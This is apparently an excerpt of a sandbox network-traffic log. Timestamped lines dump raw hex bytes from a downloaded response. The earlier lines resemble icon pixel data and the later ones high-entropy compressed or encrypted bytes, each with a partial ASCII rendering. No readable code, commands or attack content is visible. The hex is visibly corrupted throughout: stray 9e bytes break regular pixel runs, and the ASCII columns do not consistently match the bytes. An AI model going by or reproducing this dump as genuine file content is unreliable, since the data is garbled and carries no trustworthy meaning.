                                                                    2023-06-01 10:14:19 UTC265INData Raw: ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 9e e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 9e e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87 e7 ff 07 87
                                                                    Data Ascii:
                                                                    2023-06-01 10:14:19 UTC273INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 9e 00 00 00 00 00 00 00 00 06 88 e8 1f 06 88 e8 3f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 9e 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 9e 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 9e e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 9e 88 e8 7f 06 88 9e 7f 06 88 e8 7f 06 88 e8 7f 06 88 e8 7f 06 88
                                                                    Data Ascii: ?
                                                                    2023-06-01 10:14:19 UTC281INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    2023-06-01 10:14:19 UTC289INData Raw: 00 00 00 00 00 00 00 ff ff ff fe 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 9e ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    2023-06-01 10:14:19 UTC297INData Raw: 66 a4 a4 a4 5f a4 a4 a4 5a a4 9e a4 53 a4 a4 a4 4b a4 a4 a4 42 a4 a4 a4 3a a4 a4 a4 31 a4 a4 a4 25 a4 a4 a4 18 a4 a4 a4 0c a4 a4 a4 04 a4 a4 a4 01 a4 a4 a4 02 a4 a4 a4 0b a4 a4 a4 1c a4 a4 a4 34 a4 a4 a4 4d a4 9e a4 63 a4 a4 a4 72 a4 a4 a4 7d a4 a4 a4 87 a4 a4 a4 90 a4 a4 a4 99 a4 a4 a4 9f a4 a4 a4 a5 a4 a4 a4 ad a4 a4 a4 b4 a4 a4 a4 ba a4 a4 a4 bc a4 a4 a4 bd a4 a4 a4 c0 a4 a4 a4 c6 a4 a4 a4 cc a4 a4 a4 d1 a4 a4 a4 d4 a4 a4 a4 d5 a4 a4 a4 d5 a4 a4 a4 d5 a4 a4 a4 d5 a4 a4 a4 d6 a4 9e a4 d8 a4 a4 a4 db a4 a4 a4 e0 a4 a4 a4 e4 a4 a4 a4 e6 a4 a4 a4 e7 a4 a4 a4 e7 a4 a4 a4 e8 a4 a4 a4 e8 a4 a4 a4 e8 a4 a4 a4 e8 a4 a4 a4 e8 a4 a4 a4 e8 a4 a4 a4 e8 a4 a4 a4 e8 a4 a4 a4 e8 a4 9e a4 e8 a4 a4 a4 e8 a4 a4 a4 e8 a4 a4 a4 9e a4 a4 a4 ec a4 a4 a4 ef a4 a4 a4 f1 a4 a4
                                                                    Data Ascii: f_ZSKB:1%4Mcr}
                                                                    2023-06-01 10:14:19 UTC304INData Raw: ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 9e 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 9e d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 9e ff 9e 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 ff 18 63 d0 97 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: ccccccccccccccccccccccccccccccccccccccccccccccccccc
                                                                    2023-06-01 10:14:19 UTC312INData Raw: ff 15 69 d4 ff 15 69 d4 ff 15 69 d4 ff 15 69 d3 ff 9e 68 d2 ff 15 67 d1 ff 14 65 cc ff 14 63 c5 ff 13 5f bc ff 9b b9 df ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b0 c7 e2 ff 13 5a b1 ff 13 5e bb ff 14 62 c5 ff 14 65 cb ff 15 67 d0 ff 15 68 d2 ff 15 69 d3 ff 15 69 d3 ff 15 68 d2 ff 15 68 d1 ff 14 66 cd ff 14 63 c7 ff 13 60 be ff 30 6f bd ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e0 ea f4 ff 13 5a b0 ff 13 5e ba ff 14 63 c5 ff 14 65 cc ff 15 67 cf ff 15 67 d0 ff 14 66
                                                                    Data Ascii: iiiihgec_Z^beghiihhfc`0oZ^ceggf
                                                                    2023-06-01 10:14:19 UTC320INData Raw: ff 11 66 c2 ff 12 69 cb ff 12 6c d1 ff 13 6d d4 ff 13 6f d6 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 9e 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f 9e ff 13 6f d7 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 9e 00 00 12 6f d7 7f 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 9e 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 13 6f 9e ff 13 6f d7 ff 13 6f d7 ff 13 6f d7 ff 9e 6f d6 ff 13 6e d5 ff 13 6e d5 ff 9e 6d d4 ff 13 6d d3 ff 13 6c d1 ff 12 6c
                                                                    Data Ascii: filmooooooooooooooooooooooooooooooooooooooonnmmll
                                                                    2023-06-01 10:14:19 UTC328INData Raw: ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff 8d b5 dc ff 0e 66 ba ff 0e 69 c1 ff 0f 6c c8 ff 0f 6f ce ff 0f 71 d2 ff 10 72 d5 ff 10 73 d7 ff 10 73 d7 ff 10 72 d5 ff 0f 71 d2 ff 0f 6e cd ff 0f 6b c6 ff 0e 68 be ff 2b 77 bf ff e8 f0 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff 4d 8c c7 ff 0e 67 bc ff 0f 6b c6 ff 0f 6f ce ff 0f 9e d3 ff 10 73 d7 ff 10 74 d9 ff 10 75 da ff 10 9e db ff 10 75 db ff 10 75 db ff 10 75 db ff 10 9e db ff 10 75 db ff 10 75 db ff 10 75 db ff 10 75 db ff 10 75 db ff 10 75 db 9e 10 9e db ff 10 75 db ff 10 75 db ff 10 75 db ff 10 75 db ff 10 75
                                                                    Data Ascii: filoqrssrqnkh+wMgkostuuuuuuuuuuuuuuu
                                                                    2023-06-01 10:14:19 UTC336INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 7a de 7f 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a df ff 0d 7a de ff 0d 7a de ff 0d 7a dd ff 0d 7a dd ff 0d 79 dc ff 0d 79 dc ff 0d 79 dc ff 0d 79 dc ff 0d 79 db ff 0d 78 db ff 0d 78 db ff 0d 78 da ff 0d 78 d9 ff 0d 77 d8 ff 0d 76 d7 ff 0c 76 d5 ff 0c 75 d4 ff 0c 74 9e ff 0c 73 cf ff 0c 71 cc ff 0c 6f c8 ff 0c 6d c3 ff 0b 6b be ff 0b 69 b9 ff 38 83 c3 ff b2 ce e7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                    Data Ascii: zzzzzzzzzzzzzzzzzzzzzzzzzyyyyyxxxxwvvutsqomki8
                                                                    2023-06-01 10:14:19 UTC344INData Raw: ff 0a 9e e2 ff 9e 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 9e 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 9e 80 e2 ff 0a 80 e2 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 81 e2 7f 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 9e 0a 80 e2 ff 0a 80 e2 ff 0a 80 e2 ff 0a 80
                                                                    Data Ascii:
                                                                    2023-06-01 10:14:19 UTC351INData Raw: ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 9e c6 f5 9e 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 9e ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6 f5 ff 82 c6
                                                                    Data Ascii:
                                                                    2023-06-01 10:14:19 UTC359INData Raw: ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe 00 00 00 00 00 9e 00 00 00 00 9e 00 00 00 ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    2023-06-01 10:14:19 UTC367INData Raw: ff 13 6f d7 ff 13 6f d7 ff 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 6f d7 3f 12 70 d8 ff 9e 70 d8 ff 12 70 d8 ff 12 70 d8 ff 12 70 d8 ff 12 70 9e ff 12 70 d8 ff 12 70 d8 9e 12 70 d8 ff 12 70 d8 ff 12 70 d8 ff 12 70 d8 ff 12 70 d7 ff 12 6f d7 ff 12 6f d6 ff 12 6f d6 ff 12 6f d6 ff 12 6f d5 ff 12 6e d4 ff 11 6c cf ff 11 68 c6 ff 1e 6b bc ff cb dc ed ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fb fc fd ff 3d 7f c4 ff 11 68 c6 ff 11 6d d1 ff 12 6d d4 9e 11 6a cc ff 1f 6d c0 ff f1 f6 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9e ff ff ff ff ff ff 98 ba dd ff 10 65 bf ff 11 6c cf ff 12 6f d6 ff 12 70 d7 ff 12 70 d8 ff 12 70 d8 ff 12 70 d8 ff 12 70 d8 ff 12 70
                                                                    Data Ascii: ooo?pppppppppppppooooonlhk=hmmjmelopppppp
                                                                    2023-06-01 10:14:19 UTC375INData Raw: ff 74 bf f4 ff 96 d1 f8 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 9e ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a 9e f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 9a d3 f9 ff 92 cf f7 ff 67 b9 f2 ff 20 93 e9 ff 07 86 e6 ff 07 86 e6 ff 07 86 e6 e3 09 86 e6 1e 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 07 86 e6 39 07 87 e6 dd 07 87 e7 ff 07 87
                                                                    Data Ascii: tg 9
                                                                    2023-06-01 10:14:19 UTC383INData Raw: 00 00 00 00 00 00 00 00 00 0c 7a de 2f 0d 7a de ff 0c 7a de fe 0c 7a de fe 0d 7a de ff 0c 7a de fe 0c 7a de fe 0d 7a de ff 0c 7a de fe 0d 9e dc ff 0c 78 da fe 0c 78 d9 fe 0c 77 d7 fe 0c 75 d5 ff 0c 73 d0 fe 9e 70 c9 fe 1e 77 c4 ff 7f b0 da fe ea f2 f8 fe ff ff ff ff fe fe fe fe fe fe fe fe ff ff ff ff fe fe fe fe fe fe fe fe ff ff ff ff d2 e3 f2 fe 2b 80 cb fe 0c 74 d2 ff 0c 79 db fe 0d 7a de ff 0c 7a de fe 0c 7a de fe 0d 7a de ff 0c 7a de fe 0c 7a de fe 0d 7a de ff 0c 7a de fe 0c 7a de fe 0d 7a de ff 0c 7a de fe 0c 7a de fe 0d 7a de fe 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 7b df 2f 0c 7b df ff 0c 7b df ff 0c 7b df ff 0c 7b df ff 0c 7b df ff 0c 7b df ff 0c 7b de ff 0c 79 da ff 0c 75 d2 ff 0b 71 cb ff 0b 6f c6 ff 0b 6d c2 ff 9e 77
                                                                    Data Ascii: z/zzzzzzzzxxwuspw+tyzzzzzzzzzzzzz{/{{{{{{{yuqomw
                                                                    2023-06-01 10:14:19 UTC390INData Raw: 70 a3 a3 a3 70 a4 a4 a4 70 a3 a3 a3 6c a4 a4 a4 5c a4 9e a4 5b a3 a3 a3 5a a4 a4 a4 4e a4 a4 a4 46 a3 a3 a3 39 a4 a4 a4 2b a4 a4 a4 1a a3 a3 a3 06 a4 a4 a4 27 a4 a4 a4 81 a3 a3 a4 a9 8b 97 ab 9e 7e 91 af ea 7e 91 af f0 7e 91 af f3 7e 91 ae f6 7e 91 ae f7 7e 91 ae f9 7e 91 ae f9 7e 91 ae f9 7e 91 ae f9 7e 91 ae f9 7e 91 ae f9 7e 91 ae f7 7e 91 ae f6 7e 9e af f3 7e 91 af f0 7e 91 af ea 8e 99 aa d4 a4 a4 a4 a8 a4 a4 a4 81 a3 a3 a3 27 00 00 00 00 77 9e b1 07 3b 71 c3 ad 19 60 ce fe 19 60 ce fe 19 60 ce fe 19 60 ce fe 19 60 9e fe 19 60 ce fe 19 60 ce fe 19 60 ce fe 19 60 ce fe 19 60 ce fe 19 60 ce fe 19 60 ce fe 19 60 ce fe 19 60 ce fe 19 60 ce fe 19 60 ce fe 19 60 ce fe 19 60 ce fe 41 74 c1 9b 78 8f b0 04 00 00 00 00 00 00 00 00 17 62 cf 61 18 62 cf fe 18 62
                                                                    Data Ascii: pppl\[ZNF9+'~~~~~~~~~~~~~~~~'w;q``````````````````Atxbabb
                                                                    2023-06-01 10:14:19 UTC398INData Raw: 58 44 9a 30 3e ff 7a 6b bd 5b 80 84 08 55 ea 0a b9 c9 b4 0f dc 9e 27 cf 38 00 e3 70 0b 22 1c 6e a5 5a 2c ed 3f 08 f0 e4 3e a1 39 66 09 b7 aa 87 c8 3d 7f 26 03 29 94 c4 83 34 cb 66 30 7b 9e 34 ad 84 d3 f9 37 1e bd d1 11 c3 09 af 48 e6 5f 1d e4 6e a3 20 79 7c 26 80 c9 d8 bb 38 c9 d4 66 51 48 1f b8 0b 8a 46 aa ca 12 68 de 7f 1d f6 3d e9 f8 38 14 2c ec 1e 90 fd 4f 62 47 67 ff 9d 8b 25 5a c9 49 22 d2 24 7e 71 4d f0 dd 5c ff 4d 61 cc 87 20 0d e2 80 f3 1a e1 60 53 b9 18 b1 81 e2 1e f0 56 7b 89 46 60 eb 93 93 35 df 00 f7 fb 86 50 6e 0a c9 25 3b 32 a8 f8 61 df fd 87 a6 1d ba 67 37 3a 4b 97 f1 74 22 a6 f7 0c f0 3f ef 4a a2 a2 2a 7c a1 b6 85 02 39 bf f8 a0 90 e4 4b 6e 02 1d 25 8e bd 17 58 bd 59 2e e2 82 b4 90 8b 95 fc 82 7e 26 a3 e9 a5 a0 d2 bc 3c 54 91 f3 ff 2a 4c
                                                                    Data Ascii: XD0>zk[U'8p"nZ,?>9f=&)4f0{47H_n y|&8fQHFh=8,ObGg%ZI"$~qM\Ma `SV{F`5Pn%;2ag7:Kt"?J*|9Kn%XY.~&<T*L
                                                                    2023-06-01 10:14:19 UTC406INData Raw: 5f 51 4b ba 89 c1 8d 59 cb 53 6b 28 32 c4 8f 40 79 d8 fd a3 e2 65 81 db 45 f8 7d 87 74 3f 25 80 bb 65 67 0b f7 56 dd 5e 07 f2 d6 c4 a0 23 14 c1 7c 36 c8 51 31 40 e7 61 bc 97 37 de f1 33 de e1 4e 0f 32 c1 b8 cb 57 fb df 34 e3 9e ac 15 0c a8 2f db 3a 7c 63 70 2f 10 3f 75 18 13 73 ae 08 dc df 26 51 99 e4 bd 94 e3 b4 9f d3 1b f9 c2 32 8a 6c 1e 15 d4 9b b4 44 aa b1 eb f2 57 b3 ef 24 6a 6d d4 ff 02 b8 44 16 94 c5 0d 7e e0 34 a8 cb 52 61 3f fb 24 a7 a1 6e de 86 92 d9 dc 93 e1 f2 5c c9 71 dd 82 78 19 15 8e 40 fe c1 f8 72 44 26 6e 63 18 28 9f 99 c2 1a 29 63 0a 31 10 78 e6 47 bd 76 19 b4 70 4b 1f 94 09 53 1f ba 02 37 37 9e 3c a7 b3 3c 7f 66 b1 11 b7 b7 ac be 5d 02 7d 51 30 bb 8e 68 f5 28 11 b9 d1 61 e1 cd b4 ea 44 19 6d f1 50 2f 60 d2 43 49 ae 37 c2 d8 42 17 aa b7
                                                                    Data Ascii: _QKYSk(2@yeE}t?%egV^#|6Q1@a73N2W4/:|cp/?us&Q2lDW$jmD~4Ra?$n\qx@rD&nc()c1xGvpKS77<<f]}Q0h(aDmP/`CI7B
                                                                    2023-06-01 10:14:19 UTC414INData Raw: 4e a4 e1 60 cc bc 73 ab f8 b8 0f f4 3d 65 44 d6 4b 2d 31 a2 a1 7c 21 f7 f0 a5 c3 13 16 71 74 34 be f3 db d6 cf b0 00 b9 57 a1 e8 5c d2 8e 35 35 7c 3a 6f 16 b0 e1 53 f1 aa 90 d8 f6 88 58 23 20 ff 7f da 98 8d 3e 26 1f 03 15 46 3e 87 3b 33 f7 e0 91 c4 d3 98 0c 05 9d 71 ff 85 5d 0f fb 78 e1 19 9d bd 2c a6 ed bc 3d ea bc 9c 6a 87 18 3f c7 7c 3f 8d 5e 68 e2 f8 af 58 a1 9a e8 d1 d1 94 8d 8a 9a 65 6e 81 35 7c 5b 51 dc f6 dd 8d 39 2e aa ea 04 6d 0e 4f e6 05 86 84 92 ec 53 4c dc 4c 3b 73 b3 05 0c f2 51 67 8f a4 8b bb b8 5e 66 f3 de 1d 16 01 fc a5 0b 6c 8c 53 83 4b 5f bc a3 bf ba d6 a0 e6 a6 47 76 0e 24 d7 e3 98 c7 5a 7e 44 cc f1 76 42 ba a3 51 98 b9 74 e5 15 8b 57 c2 68 4f 8d 75 90 e4 4c 00 9b 95 2e 56 ad 75 19 5b 1d 30 1b 92 e4 11 d9 6f 3e eb 50 68 c8 be d4 b4 2e
                                                                    Data Ascii: N`s=eDK-1|!qt4W\55|:oSX# >&F>;3q]x,=j?|?^hXen5|[Q9.mOSLL;sQg^flSK_Gv$Z~DvBQtWhOuL.Vu[0o>Ph.
                                                                    2023-06-01 10:14:19 UTC422INData Raw: 55 79 0f 0a 66 c3 43 0b 50 f0 41 db ee 8f 19 03 72 64 88 ad e5 63 57 62 0e ab 6a ec 8e 78 b4 a7 a0 ae 36 ec 0c a2 f9 1d 73 8e 4d c5 76 f2 de f2 cf 47 7b 2b 3e 31 6e 72 99 51 93 3d 75 83 4f fe 81 66 4d 5e 14 4f 2a 19 75 94 de 39 29 86 32 12 50 19 4f 4d 00 35 75 4a 8d 79 e8 6b b1 ba 3c 61 80 d8 2c 6e 61 4e 87 03 a7 20 b5 79 2b 7f ca 08 ff 01 ba 51 5e 92 89 97 39 c6 17 40 6c 7a 05 a7 77 08 d4 c3 cd 77 fd 26 56 ab 31 c2 35 98 c1 6e d1 44 76 a9 0b e1 1e 57 d3 33 ca f8 a6 f3 0c b3 05 89 46 47 f9 5f 59 eb 4a 51 ca b0 dd 2c be b2 64 2e e6 e0 4e 4c 9f 85 ce 3f 9e 34 41 78 bf 6d bf 00 98 53 95 c0 2b 6c a2 d8 c1 fb 35 d1 2d f9 3f 50 78 c0 6a 5b 00 a7 3b d8 0c a5 d9 ff 79 d7 d9 31 f5 13 91 5b f0 d5 e0 8d a8 d0 e5 f9 15 9a 11 bf 5e 18 ca d1 0a 5e f7 3b 83 dc 65 65 5b
                                                                    Data Ascii: UyfCPArdcWbjx6sMvG{+>1nrQ=uOfM^O*u9)2POM5uJyk<a,naN y+Q^9@lzww&V15nDvW3FG_YJQ,d.NL?4AxmS+l5-?Pxj[;y1[^^;ee[
                                                                    2023-06-01 10:14:19 UTC429INData Raw: 79 9e 39 21 d6 20 c9 6e 52 fc 19 05 a1 da 07 da 3d 41 be 4e a2 92 36 10 9f c2 81 1e 86 6e 92 9e fb cc e3 ba 19 4e 74 b4 a0 7c 78 10 24 18 b0 ac 25 12 d1 80 35 2d c3 85 ec bf 95 8f 7d 59 97 5b 75 00 ee 52 75 2c 8f e7 b7 5e 48 30 c5 d7 39 b8 e2 99 70 18 82 7f 36 51 98 7f 40 c9 27 15 2c 9e 12 8e bf 3d d3 95 04 42 cd 61 05 42 97 f5 f4 fd dd df a9 1d 94 3f 29 1b 18 85 9e 14 f5 a0 5f 1b eb c8 bb af 91 2a 0a 95 1b 66 f1 22 61 32 89 fa 27 48 7f b9 f2 cb de 1d 76 d8 30 91 29 51 b3 6e 36 d2 05 61 04 d5 32 34 87 82 34 4d 1b d4 bc 4b 4d e2 10 33 7c 6d 77 ad 31 66 41 44 5e 22 b1 d8 78 88 b7 17 58 36 ff 9b 60 b5 b2 c5 cc 90 3d 0c b0 63 36 fa 27 79 5a 61 93 d8 c7 c4 22 cd ee db fe 42 95 26 3c c0 b5 54 f5 80 50 02 1b 75 0f 6a 01 53 72 53 18 5f 60 